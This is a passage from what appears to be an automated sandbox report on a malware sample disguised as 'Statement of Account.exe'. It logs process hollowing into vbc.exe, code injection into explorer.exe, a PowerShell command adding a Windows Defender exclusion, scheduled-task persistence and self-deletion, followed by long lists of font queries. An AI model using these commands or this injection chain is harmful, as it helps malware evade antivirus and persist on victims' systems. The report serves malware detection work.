          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05CC4DD7 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C4ADE0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C60DE1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C3CDEA mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C36DF6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C6CDF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C6CDF0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05CE0DF0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C76DA0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C7CDB1 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C7CDB1 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C68DBF mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05D14DAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05D08DAE mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C40D59 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C48D59 mov eax, dword ptr fs:[00000030h] (5 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05CD8D6B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C5AD00 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C36D10 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C74D1D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05CF8D10 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05D14D30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05CC8D20 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C3CCC8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C38CD0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C72CF0 mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C38C8D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05CBCCA0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05CBCCA0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C68CB1 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05CF0CB5 mov eax, dword ptr fs:[00000030h] (13 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C4AC50 mov eax, dword ptr fs:[00000030h] (6 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C46C50 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C74C59 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05CC4C0F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C50C00 mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C7CC00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C3EC20 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05CDCC20 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05CE4C34 mov eax, dword ptr fs:[00000030h] (6 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05CE4C34 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C42FC8 mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C3EFD8 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05D14FE7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05CF6FF7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C80FF6 mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C7CF80 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C72F98 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05CC4F40 mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05CE4F42 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C3CF50 mov eax, dword ptr fs:[00000030h] (6 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C7CF50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05CE0F50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05CE2F60 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C6AF69 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05D14F68 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05CF6F00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C42F12 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C7CF1F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C6EF28 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05CF6ED0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C46EE0 mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C78EF5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C3AE90 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C72E9C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05C72E9C mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05CCCEA0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_05CDAEB0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\Statement of Account.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\Desktop\Statement of Account.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SIZfuXT.exe"
          Source: C:\Users\user\Desktop\Statement of Account.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and write
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and write
          Source: C:\Users\user\Desktop\Statement of Account.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: NULL target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: NULL target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write (2 occurrences)
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Thread register set: target process: 2580
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread register set: target process: 2580Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread register set: target process: 2580Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 2580
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: C30000Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 9E0000Jump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000Jump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 401000Jump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 5209008Jump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 401000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 998008Jump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SIZfuXT.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpC2DD.tmp"Jump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpCFFD.tmp"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
          Source: explorer.exe, 00000007.00000000.1738008014.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3108248750.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1743570907.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000000.1732859859.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.4165526139.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000007.00000002.4164952782.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1732420107.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
          Source: explorer.exe, 00000007.00000000.1732859859.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.4165526139.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000007.00000000.1732859859.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.4165526139.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Users\user\Desktop\Statement of Account.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
